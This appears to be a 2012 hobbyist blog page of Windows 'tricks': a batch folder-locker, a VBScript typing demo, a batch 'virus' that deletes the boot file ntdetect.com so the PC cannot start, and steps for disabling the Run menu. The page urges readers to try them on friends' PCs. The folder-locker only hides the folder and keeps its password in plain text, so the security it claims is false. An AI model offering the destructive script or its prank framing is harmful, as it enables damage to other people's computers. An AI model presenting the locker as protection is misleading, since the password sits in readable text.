Saturday, November 10, 2012
FOLDER LOCK WITHOUT USING ANY S/W
Folder Lock Without Using any Software
Open Notepad & copy this Code :
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== Your Password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Now before Saving it .. You will find "Your Password " in the code .. there you can enter
your password & Then Save it as " Lock.bat "
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== Your Password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Now before Saving it .. You will find "Your Password " in the code .. there you can enter
your password & Then Save it as " Lock.bat "
A ROBO WRITING FOR U
A Robo Writing For U
How do u feel when some robo is writing for u ,it would be awesome .... So try this code ,the robo will write for u
Code :
Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "H"
wscript.sleep 400
wshshell.sendkeys "I"
wscript.sleep 400
wshshell.sendkeys " "
wscript.sleep 400
wshshell.sendkeys "R"
wscript.sleep 400
wshshell.sendkeys "A"
wscript.sleep 400
wshshell.sendkeys "V"
wscript.sleep 400
wshshell.sendkeys "I"
wscript.sleep 400
VIRUS TO TURNOFF PC FOREVER AND EVER
Virus To Shutdown A PC Forever
Step 1 : Open the Notepad and Copy this code in it
Code :
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print Ur PC is Hacked by Me
Step 2 : Save it as " shut.bat " .. This Virus will shutdown the PC and never opens again because it deletes the " OS Booting Files "So never try it in your PC or illegally ...
DISABLE / ENABLE RUN 4M PC
Disable or Enable Run From PC
When i was trying for a new hack , i
just wanted to use the " run " to open cmd .. So i got an idea that to
disable the run only itself .... So Follow my steps to Disable Run
Step 1 : Start->Run->gpedit.msc->User Configuration->Adminstrator Templates->Start Menu & Taskbar->Remove Run menu from start menu
Step 2 : Now you will find the Remove Run from Start Menu then Double click on the Remove Run and disable the Run from the Start Menu
Step 3 : Now If you want the Run again then just change the Disable to Enable and again use your Run .... Try it in your friends PC
Step 1 : Start->Run->gpedit.msc->User Configuration->Adminstrator Templates->Start Menu & Taskbar->Remove Run menu from start menu
Step 2 : Now you will find the Remove Run from Start Menu then Double click on the Remove Run and disable the Run from the Start Menu
Step 3 : Now If you want the Run again then just change the Disable to Enable and again use your Run .... Try it in your friends PC
Subscribe to:
Posts (Atom)


